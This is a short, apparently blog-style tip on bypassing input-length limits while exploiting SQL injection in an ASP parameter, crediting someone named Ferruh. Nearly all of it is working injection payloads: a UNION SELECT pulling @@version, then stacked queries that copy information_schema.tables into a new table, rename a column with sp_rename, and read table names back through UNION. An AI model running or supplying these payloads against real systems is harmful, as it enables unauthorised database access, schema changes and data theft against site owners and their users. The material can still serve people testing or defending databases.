Input Length restriction in SQL Injections

Often While exploiting SQL Injections, one encounters restrictions on the length of input a vulnerable parameter can take. e.g

  • myhost/vuln.asp?vuln=a' union all select 1,2,3,4,5,6,@@version-- works
  • myhost/vuln.asp?vuln=a' union all select 1,2,3,4,5,6,table_name from information_schema.tables-- may not work(too long)

One solution to this problem could be:-

  • myhost/vuln.asp?vuln=a';select * into xx from information_schema.tables--
  • myhost/vuln.asp?vuln=a';exec sp_rename 'xx.table_name','xx.tn'--
  • myhost/vuln.asp?vuln=a'union all select 1,2,3,4,5,6,tn from xx--

 Thanks Ferruh for the help